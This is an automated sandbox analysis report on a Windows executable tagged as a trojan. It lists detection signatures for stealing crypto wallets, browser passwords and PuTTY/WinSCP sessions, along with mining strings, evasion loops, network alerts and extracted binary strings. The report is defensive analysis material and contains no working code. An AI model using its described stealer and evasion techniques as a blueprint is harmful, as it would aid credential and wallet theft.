Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1583965
MD5:a9172666da67d245c710fd71407178f1
SHA1:ee8f90321c91171e489d7a8e6a1415f075468eb6
SHA256:ed298ed0a286707fb06ae7ad689e2fe26b948604fca7f9e375a22eda2388adbb
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Maps a DLL or memory area into another process
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • random.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\random.exe" MD5: A9172666DA67D245C710FD71407178F1)
    • msedge.exe (PID: 7996 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7332 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2056,i,4096293946836122851,18064520161421918287,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 5224 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7628 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6472 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7980 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6644 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 3672 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 3748 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
  • msedge.exe (PID: 1260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 732 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2128,i,5363486696268237516,2027687803800706912,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • msedge.exe (PID: 6208 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6260 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2616 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6908 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=3780 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • identity_helper.exe (PID: 3548 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
    • identity_helper.exe (PID: 1516 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4440 --field-trial-handle=2512,i,5107552297189336468,14131922064952018529,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-03T23:32:28.680095+010020283713Unknown Traffic192.168.2.449737188.114.96.3443TCP
2025-01-03T23:32:29.808865+010020283713Unknown Traffic192.168.2.449738188.114.96.3443TCP
2025-01-03T23:32:30.640921+010020283713Unknown Traffic192.168.2.449739188.114.96.3443TCP
2025-01-03T23:33:04.464063+010020283713Unknown Traffic192.168.2.449899188.114.96.3443TCP
2025-01-03T23:33:05.626111+010020283713Unknown Traffic192.168.2.449905188.114.96.3443TCP
2025-01-03T23:33:06.501607+010020283713Unknown Traffic192.168.2.449911188.114.96.3443TCP
2025-01-03T23:33:07.302639+010020283713Unknown Traffic192.168.2.449919188.114.96.3443TCP
2025-01-03T23:33:08.135993+010020283713Unknown Traffic192.168.2.449927188.114.96.3443TCP
2025-01-03T23:33:09.105183+010020283713Unknown Traffic192.168.2.449936188.114.96.3443TCP
2025-01-03T23:33:10.233902+010020283713Unknown Traffic192.168.2.449942188.114.96.3443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: random.exeReversingLabs: Detection: 28%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

barindex
Source: random.exe, 00000000.00000003.2272030607.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jsecoin.com
Source: random.exe, 00000000.00000003.2240216428.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: coinhive.com/
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: Z\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2J source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tics. source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbK} source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: random.exe, 00000000.00000003.2344673677.000001D2E6CA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbm}mn source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ers\jonT source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UC:\Users\user\AppData\Local\Google\Chrome\User Data\.pdb\01AB9056EA9380F71644C4339E3FA1AC28 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateZ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbN source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: V\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831y source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statet source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2f source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local State source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347715541.000001D2E6C29000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2348250269.000001D2E6C2A000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346788951.000001D2E6C2A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: [C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Publishers. source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: l\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: random.exe, 00000000.00000003.2344891449.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2345221924.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2344766987.000001D2E6CD7000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini;7 source: random.exe, 00000000.00000003.2347653380.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356351812.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347945444.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346135417.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2356716114.000001D2E6CDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: v\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb{N3or source: random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831% source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1h2txyewy\LocalStan source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statek source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbNL source: random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb/L m source: random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: APP169~1.LOGntkrnlmp.pdb5x, source: random.exe, 00000000.00000003.2344673677.000001D2E6CA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2z source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdby}Yn source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local Statel\Pac source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb}}]n source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BROWSE~1.PDBBrowserMetricsdb source: random.exe, 00000000.00000003.2067117718.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp
